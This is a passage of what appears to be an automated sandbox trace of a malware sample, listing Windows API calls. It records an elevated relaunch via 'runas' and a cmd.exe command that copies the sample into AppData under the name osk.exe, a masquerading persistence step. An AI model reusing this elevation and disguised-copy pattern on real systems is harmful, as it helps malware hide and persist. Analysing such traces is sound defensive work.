returned 0x27000c [0057.704] GlobalUnlock (hMem=0x27000c) returned 0 [0057.704] GlobalHandle (pMem=0x5cf090) returned 0x270004 [0057.704] GlobalUnlock (hMem=0x270004) returned 0 [0057.704] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x5896f0, cbMultiByte=5, lpWideCharStr=0x18edf4, cchWideChar=2047 | out: lpWideCharStr="runasxe[矆\x04") returned 5 [0057.704] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fbe8, nSize=0x20a | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe")) returned 0x30 [0057.704] GlobalLock (hMem=0x270004) returned 0x5e7988 [0057.704] GlobalHandle (pMem=0x5e7988) returned 0x270004 [0057.704] GlobalUnlock (hMem=0x270004) returned 0 [0057.704] GlobalLock (hMem=0x270004) returned 0x5e7988 [0057.704] GlobalLock (hMem=0x27000c) returned 0x5cf090 [0057.704] GlobalHandle (pMem=0x5e7988) returned 0x270004 [0057.704] GlobalUnlock (hMem=0x270004) returned 0 [0057.706] GlobalHandle (pMem=0x5cf090) returned 0x27000c [0057.706] GlobalUnlock (hMem=0x27000c) returned 0 [0057.706] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x589768, cbMultiByte=5, lpWideCharStr=0x18edbc, cchWideChar=2047 | out: lpWideCharStr="runas\x18\n") returned 5 [0057.706] ShellExecuteW (hwnd=0x0, lpOperation="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", lpParameters="runas", lpDirectory=0x0, nShowCmd=1) returned 0x2a [0057.799] ExitProcess (uExitCode=0x0) Thread: id = 2 os_tid = 0x568 Thread: id = 3 os_tid = 0x6f4 Thread: id = 5 os_tid = 0x114 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4817c000" os_pid = "0x534" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x4e4" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 4 os_tid = 0x70c [0057.591] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fb2c | out: lpSystemTimeAsFileTime=0x26fb2c*(dwLowDateTime=0xed1a5240, dwHighDateTime=0x1d61645)) [0057.592] GetCurrentProcessId () returned 0x534 [0057.592] GetCurrentThreadId () returned 0x70c [0057.592] GetTickCount () returned 0x114735c [0057.592] QueryPerformanceCounter (in: lpPerformanceCount=0x26fb24 | out: lpPerformanceCount=0x26fb24*=17794632790) returned 1 [0057.593] GetModuleHandleA (lpModuleName=0x0) returned 0x4abc0000 [0057.593] __set_app_type (_Type=0x1) [0057.593] __p__fmode () returned 0x770331f4 [0057.594] __p__commode () returned 0x770331fc [0057.594] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4abe21a6) returned 0x0 [0057.595] __getmainargs (in: _Argc=0x4abe4238, _Argv=0x4abe4240, _Env=0x4abe423c, _DoWildCard=0, _StartInfo=0x4abe4140 | out: _Argc=0x4abe4238, _Argv=0x4abe4240, _Env=0x4abe423c) returned 0 [0057.595] GetCurrentThreadId () returned 0x70c [0057.595] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x70c) returned 0x60 [0057.595] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0057.595] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0057.595] SetThreadUILanguage (LangId=0x0) returned 0x409 [0057.596] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0057.596] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fabc | out: phkResult=0x26fabc*=0x0) returned 0x2 [0057.596] VirtualQuery (in: lpAddress=0x26faf3, lpBuffer=0x26fa8c, dwLength=0x1c | out: lpBuffer=0x26fa8c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0057.596] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fa8c, dwLength=0x1c | out: lpBuffer=0x26fa8c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0057.596] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fa8c, dwLength=0x1c | out: lpBuffer=0x26fa8c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0057.596] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fa8c, dwLength=0x1c | out: lpBuffer=0x26fa8c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0057.596] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fa8c, dwLength=0x1c | out: lpBuffer=0x26fa8c*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x30000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0057.596] GetConsoleOutputCP () returned 0x1b5 [0057.596] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4abe4260 | out: lpCPInfo=0x4abe4260) returned 1 [0057.597] SetConsoleCtrlHandler (HandlerRoutine=0x4abde72a, Add=1) returned 1 [0057.597] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.597] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0057.597] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.597] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4abe41ac | out: lpMode=0x4abe41ac) returned 1 [0057.597] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.597] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0057.597] _get_osfhandle (_FileHandle=0) returned 0x3 [0057.597] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4abe41b0 | out: lpMode=0x4abe41b0) returned 1 [0057.599] _get_osfhandle (_FileHandle=0) returned 0x3 [0057.599] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0057.599] GetEnvironmentStringsW () returned 0x362168* [0057.599] GetProcessHeap () returned 0x350000 [0057.599] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xaca) returned 0x362c40 [0057.599] FreeEnvironmentStringsW (penv=0x362168) returned 1 [0057.599] GetProcessHeap () returned 0x350000 [0057.599] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x4) returned 0x361850 [0057.600] GetEnvironmentStringsW () returned 0x362168* [0057.600] GetProcessHeap () returned 0x350000 [0057.600] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xaca) returned 0x363718 [0057.600] FreeEnvironmentStringsW (penv=0x362168) returned 1 [0057.600] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ea2c | out: phkResult=0x26ea2c*=0x68) returned 0x0 [0057.600] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x0, lpData=0x26ea38*=0x0, lpcbData=0x26ea30*=0x1000) returned 0x2 [0057.600] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x4, lpData=0x26ea38*=0x1, lpcbData=0x26ea30*=0x4) returned 0x0 [0057.600] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x0, lpData=0x26ea38*=0x1, lpcbData=0x26ea30*=0x1000) returned 0x2 [0057.600] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x4, lpData=0x26ea38*=0x0, lpcbData=0x26ea30*=0x4) returned 0x0 [0057.600] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x4, lpData=0x26ea38*=0x40, lpcbData=0x26ea30*=0x4) returned 0x0 [0057.600] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x4, lpData=0x26ea38*=0x40, lpcbData=0x26ea30*=0x4) returned 0x0 [0057.600] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x0, lpData=0x26ea38*=0x40, lpcbData=0x26ea30*=0x1000) returned 0x2 [0057.600] RegCloseKey (hKey=0x68) returned 0x0 [0057.600] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ea2c | out: phkResult=0x26ea2c*=0x68) returned 0x0 [0057.601] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x0, lpData=0x26ea38*=0x40, lpcbData=0x26ea30*=0x1000) returned 0x2 [0057.601] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x4, lpData=0x26ea38*=0x1, lpcbData=0x26ea30*=0x4) returned 0x0 [0057.601] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x0, lpData=0x26ea38*=0x1, lpcbData=0x26ea30*=0x1000) returned 0x2 [0057.601] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x4, lpData=0x26ea38*=0x0, lpcbData=0x26ea30*=0x4) returned 0x0 [0057.601] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x4, lpData=0x26ea38*=0x9, lpcbData=0x26ea30*=0x4) returned 0x0 [0057.601] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x4, lpData=0x26ea38*=0x9, lpcbData=0x26ea30*=0x4) returned 0x0 [0057.601] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x0, lpData=0x26ea38*=0x9, lpcbData=0x26ea30*=0x1000) returned 0x2 [0057.601] RegCloseKey (hKey=0x68) returned 0x0 [0057.601] time (in: timer=0x0 | out: timer=0x0) returned 0x5e9c43c0 [0057.601] srand (_Seed=0x5e9c43c0) [0057.601] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"" [0057.601] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"" [0057.602] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4abe5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0057.602] GetProcessHeap () returned 0x350000 [0057.602] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x210) returned 0x362168 [0057.602] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x362170, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0057.603] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4abf0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0057.603] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4abf0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0057.603] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4abf0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0057.603] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0057.603] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0057.604] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0057.604] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0057.604] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0057.604] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0057.604] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0057.604] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0057.604] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0057.604] GetProcessHeap () returned 0x350000 [0057.604] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x362c40 | out: hHeap=0x350000) returned 1 [0057.604] GetEnvironmentStringsW () returned 0x362380* [0057.604] GetProcessHeap () returned 0x350000 [0057.604] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xae2) returned 0x364ce0 [0057.604] FreeEnvironmentStringsW (penv=0x362380) returned 1 [0057.604] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4abf0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0057.604] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4abf0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0057.604] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0057.604] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0057.604] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0057.604] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0057.604] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0057.604] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0057.604] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0057.604] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0057.604] GetProcessHeap () returned 0x350000 [0057.604] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x30) returned 0x361fe8 [0057.604] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f7f8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0057.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x26f7f8, lpFilePart=0x26f7f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x26f7f4*="system32") returned 0x13 [0057.605] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0057.605] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x26f574 | out: lpFindFileData=0x26f574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x3657d0 [0057.605] FindClose (in: hFindFile=0x3657d0 | out: hFindFile=0x3657d0) returned 1 [0057.605] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x26f574 | out: lpFindFileData=0x26f574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x350ff0 [0057.605] FindClose (in: hFindFile=0x350ff0 | out: hFindFile=0x350ff0) returned 1 [0057.605] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0057.605] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0057.605] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0057.605] GetProcessHeap () returned 0x350000 [0057.605] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364ce0 | out: hHeap=0x350000) returned 1 [0057.605] GetEnvironmentStringsW () returned 0x3641f0* [0057.605] GetProcessHeap () returned 0x350000 [0057.605] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xb12) returned 0x364d10 [0057.606] FreeEnvironmentStringsW (penv=0x3641f0) returned 1 [0057.606] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4abe5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0057.606] GetProcessHeap () returned 0x350000 [0057.606] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x361fe8 | out: hHeap=0x350000) returned 1 [0057.606] GetProcessHeap () returned 0x350000 [0057.606] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x400e) returned 0x365830 [0057.606] GetProcessHeap () returned 0x350000 [0057.606] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xf2) returned 0x350ff0 [0057.606] GetProcessHeap () returned 0x350000 [0057.606] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x365830 | out: hHeap=0x350000) returned 1 [0057.606] GetConsoleOutputCP () returned 0x1b5 [0057.606] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4abe4260 | out: lpCPInfo=0x4abe4260) returned 1 [0057.606] GetUserDefaultLCID () returned 0x409 [0057.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4abe4950, cchData=8 | out: lpLCData=":") returned 2 [0057.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f938, cchData=128 | out: lpLCData="0") returned 2 [0057.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f938, cchData=128 | out: lpLCData="0") returned 2 [0057.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f938, cchData=128 | out: lpLCData="1") returned 2 [0057.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4abe4940, cchData=8 | out: lpLCData="/") returned 2 [0057.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4abe4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0057.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4abe4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0057.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4abe4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0057.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4abe4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0057.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4abe4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0057.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4abe4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0057.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4abe4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0057.608] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4abe4930, cchData=8 | out: lpLCData=".") returned 2 [0057.608] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4abe4920, cchData=8 | out: lpLCData=",") returned 2 [0057.608] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0057.609] GetProcessHeap () returned 0x350000 [0057.609] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x0, Size=0x20c) returned 0x362ea0 [0057.609] GetConsoleTitleW (in: lpConsoleTitle=0x362ea0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0057.609] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0057.610] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0057.610] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0057.610] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0057.611] GetProcessHeap () returned 0x350000 [0057.611] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x400a) returned 0x365830 [0057.611] GetProcessHeap () returned 0x350000 [0057.611] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x365830 | out: hHeap=0x350000) returned 1 [0057.611] _wcsicmp (_String1="copy", _String2=")") returned 58 [0057.612] _wcsicmp (_String1="FOR", _String2="copy") returned 3 [0057.612] _wcsicmp (_String1="FOR/?", _String2="copy") returned 3 [0057.612] _wcsicmp (_String1="IF", _String2="copy") returned 6 [0057.612] _wcsicmp (_String1="IF/?", _String2="copy") returned 6 [0057.612] _wcsicmp (_String1="REM", _String2="copy") returned 15 [0057.612] _wcsicmp (_String1="REM/?", _String2="copy") returned 15 [0057.612] GetProcessHeap () returned 0x350000 [0057.612] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x58) returned 0x3510f0 [0057.612] GetProcessHeap () returned 0x350000 [0057.612] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x12) returned 0x351150 [0057.615] GetProcessHeap () returned 0x350000 [0057.615] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xe6) returned 0x351170 [0057.615] GetConsoleTitleW (in: lpConsoleTitle=0x26f630, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0057.616] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0057.616] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0057.616] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0057.616] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0057.616] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0057.616] GetProcessHeap () returned 0x350000 [0057.616] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x1c4) returned 0x3630b8 [0057.617] GetProcessHeap () returned 0x350000 [0057.617] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x3630b8, Size=0xe8) returned 0x3630b8 [0057.617] GetProcessHeap () returned 0x350000 [0057.617] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3630b8) returned 0xe8 [0057.620] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0057.620] GetProcessHeap () returned 0x350000 [0057.620] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xf0) returned 0x3631a8 [0057.620] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4abe5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0057.620] GetProcessHeap () returned 0x350000 [0057.620] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x2c) returned 0x351260 [0057.620] GetProcessHeap () returned 0x350000 [0057.620] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x2c) returned 0x3632a0 [0057.620] GetProcessHeap () returned 0x350000 [0057.620] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x18) returned 0x351298 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", 